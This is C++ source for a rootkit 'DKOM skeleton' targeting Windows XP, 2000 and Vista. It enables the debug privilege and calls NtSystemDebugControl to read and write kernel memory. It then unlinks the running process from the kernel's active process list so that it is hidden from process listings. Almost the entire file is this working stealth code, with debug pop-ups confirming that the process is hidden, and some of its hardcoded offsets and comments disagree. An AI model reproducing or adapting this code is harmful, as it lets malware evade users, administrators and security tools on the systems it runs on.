DKOM skeleton

1. #define WIN32_LEAN_AND_MEAN
2. #include <windows.h>
3. #include <stdio.h>
4. #include <shlwapi.h>
5. #pragma comment (lib, "ntdll.lib")
6. #pragma comment (lib, "advapi32.lib")
7.  
8. typedef LONG NTSTATUS;
9.  
10. #define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
11. //ivanlef0u's code
12. //xp sp2 ntoskrnl 5.1.2600, les chiffre indiquent la taille de la struct à passer en argument
13. typedef enum _DEBUG_CONTROL_CODE {
14.     DebugSysGetTraceInformation=1,
15.     DebugSysSetInternalBreakpoint, //0x38
16.     DebugSysSetSpecialCall, //0x4
17.     DebugSysClerSpecialCalls,  //no args kill all special calls
18.     DebugSysQuerySpecialCalls,
19.     DebugSysBreakpointWithStatus,
20.     DebugSysGetVersion, //0x28
21.  
22.     //sources de reactos écrit par notre alex ionescu préféré ntexapi.h
23.     DebugSysReadVirtual = 8, //0x10
24.     DebugSysWriteVirtual = 9,
25.     DebugSysReadPhysical = 10,
26.     DebugSysWritePhysical = 11,
27.    
28.     DebugSysReadControlSpace=12, //0x18
29.     DebugSysWriteControlSpace, //0x18
30.     DebugSysReadIoSpace, //0x20
31.     DebugSysSysWriteIoSpace, //0x20
32.     DebugSysReadMsr, //0x10
33.     DebugSysWriteMsr, //0x10
34.     DebugSysReadBusData, //0x18
35.     DebugSysWriteBusData, //0x18
36.     DebugSysCheckLowMemory,
37. } DEBUG_CONTROL_CODE;
38.  
39. typedef struct _SYSDBG_VIRTUAL {
40.     PVOID Address;
41.     PVOID Buffer;
42.     ULONG Request;
43. } SYSDBG_VIRTUAL, *PSYSDBG_VIRTUAL;
44.  
45. extern "C"
46. __declspec(dllimport)
47. ULONG
48. __stdcall
49. NtSystemDebugControl(
50.     DEBUG_CONTROL_CODE ControlCode,
51.     PVOID InputBuffer,
52.     ULONG InputBufferLength,
53.     PVOID OutputBuffer,
54.     ULONG OutputBufferLength,
55.     PULONG ReturnLength
56. );
57.  
58. extern "C"
59. __declspec(dllimport)
60. ULONG
61. __stdcall
62. RtlNtStatusToDosError(
63.   NTSTATUS Status
64. );
65.  
66. #define PKPCR 0xffdff000 // <=> fs:[0] in KeLand
67.  
68. //FUNCTIONS:
69.  
70. //Check OS and get the right Offset:
71. int CheckOSVersion( int &Offset )
72. {
73.     //xWeasel's Code for checking OS's and setting the right Offset
74.  
75.     OSVERSIONINFO osvi;
76.  
77.     ZeroMemory(&osvi, sizeof(OSVERSIONINFO));
78.     osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
79.     GetVersionEx(&osvi);
80.     if(osvi.dwPlatformId == VER_PLATFORM_WIN32_NT && osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 1)
81.     {
82.         Offset = 0x88; //WinXP
83.         return 1;
84.     }
85.     else if(osvi.dwPlatformId == VER_PLATFORM_WIN32_NT && osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 0)
86.     {
87.         Offset = 0xA0; //Win2000
88.         return 1;
89.     }
90.     else if(osvi.dwPlatformId == VER_PLATFORM_WIN32_NT && osvi.dwMajorVersion == 6 && osvi.dwMinorVersion == 0)
91.     {
92.         Offset = 0xA0; //VISTA
93.         return 1;
94.     }
95.     else
96.     {
97.         return 0;
98.     }
99.     return 0;
100. }
101.  
102. ULONG EnablePrivilege(char *Privilege)
103. {
104.     HANDLE hToken;
105.     ULONG Ret=1;
106.     TOKEN_PRIVILEGES TP;
107.     LUID Luid;
108.    
109.     if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
110.     {
111.         Ret=0;
112.         goto bye;  
113.     }
114.    
115.     if(!LookupPrivilegeValue(NULL, Privilege, &TP.Privileges[0].Luid))
116.     {
117.         Ret=0;
118.         goto bye;  
119.        
120.     }
121.    
122.     TP.PrivilegeCount=1;
123.     TP.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
124.    
125.     if(!AdjustTokenPrivileges(hToken,
126.                             false,
127.                             &TP,
128.                             NULL,
129.                             NULL,
130.                             NULL))
131.     {
132.         Ret=0;
133.         goto bye;  
134.        
135.     }
136.    
137.     bye:
138.     CloseHandle(hToken);
139.    
140.     return Ret;
141. }
142.  
143. int HideCurrentProcess( int Offset )
144. {
145.     ULONG Status, Addr, PrevEPROCESS, NextEPROCESS;
146.     SYSDBG_VIRTUAL Mem;
147.  
148.     if(!EnablePrivilege("SeDebugPrivilege"))
149.     {  
150.         return 0;
151.     }
152.  
153.     /**************** CURRENT ETHREAD ****************/
154.     Mem.Address=(PVOID)(PKPCR+0x124); //KPRRCB-> +0x004 CurrentThread    : Ptr32 _KTHREAD
155.     Mem.Buffer=&Addr;
156.     Mem.Request=sizeof(ULONG);
157.    
158.     Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
159.     if(Status!=STATUS_SUCCESS)
160.     {  
161.         return 0;
162.     }
163.        
164.     /**************** CURRENT EPROCESS ****************/
165.     Mem.Address=(PVOID)(Addr+0x220); //ETHREAD-> +0x220 ThreadsProcess : Ptr32 _EPROCESS
166.     Mem.Buffer=&Addr;
167.     Mem.Request=sizeof(ULONG);
168.    
169.     Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
170.     if(Status!=STATUS_SUCCESS)
171.     {      
172.         return 0;
173.     }
174.    
175.     /**************** PREV EPROCESS ****************/
176.     Mem.Address=(PVOID)(Addr+0x8C); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY
177.     Mem.Buffer=&PrevEPROCESS;
178.     Mem.Request=sizeof(ULONG);
179.  
180.     Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
181.     if(Status!=STATUS_SUCCESS)
182.     {      
183.         return 0;
184.     }
185.  
186.     /**************** NEXT EPROCESS ****************/
187.     Mem.Address=(PVOID)(Addr+Offset); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY
188.     Mem.Buffer=&NextEPROCESS;
189.     Mem.Request=sizeof(ULONG);
190.  
191.     Status=NtSystemDebugControl(DebugSysReadVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
192.     if(Status!=STATUS_SUCCESS)
193.     {      
194.         return 0;
195.     }
196.        
197.     /**************** PREV EPROCESS TO NEXT EPROCESS ****************/
198.     Mem.Address=(PVOID)(PrevEPROCESS); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY
199.     Mem.Buffer=&NextEPROCESS;
200.     Mem.Request=sizeof(ULONG);
201.  
202.     Status=NtSystemDebugControl(DebugSysWriteVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
203.     if(Status!=STATUS_SUCCESS)
204.     {      
205.         return 0;
206.     }
207.  
208.     /**************** NEXT EPROCESS TO PREV EPROCESS ****************/
209.     Mem.Address=(PVOID)(NextEPROCESS+0x4); //EPROCESS-> +0x088 ActiveProcessLinks : _LIST_ENTRY
210.     Mem.Buffer=&PrevEPROCESS;
211.     Mem.Request=sizeof(ULONG);
212.  
213.     Status=NtSystemDebugControl(DebugSysWriteVirtual, &Mem , sizeof(SYSDBG_VIRTUAL), NULL, 0, NULL);
214.     if(Status!=STATUS_SUCCESS)
215.     {      
216.         return 0;
217.     }
218.    
219.     return 1; //SUCCED Stuff is hidden!!
220. }
221.  
222. //MAIN FUNCTION
223.  
224. int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
225. {
226.     MessageBox(NULL,"Starting Main Function","Welcome",MB_OK);//DEBUG
227.    
228.     int Offset;
229.  
230.     if ( CheckOSVersion(Offset) == 1)
231.     {
232.         HideCurrentProcess(Offset);//OK to hide
233.         MessageBox(NULL,"Check if I'm hidden now!! Press OK to exit","FOUND!",MB_OK); //DEBUG
234.  
235.     }
236.  
237.     return 0;
238. }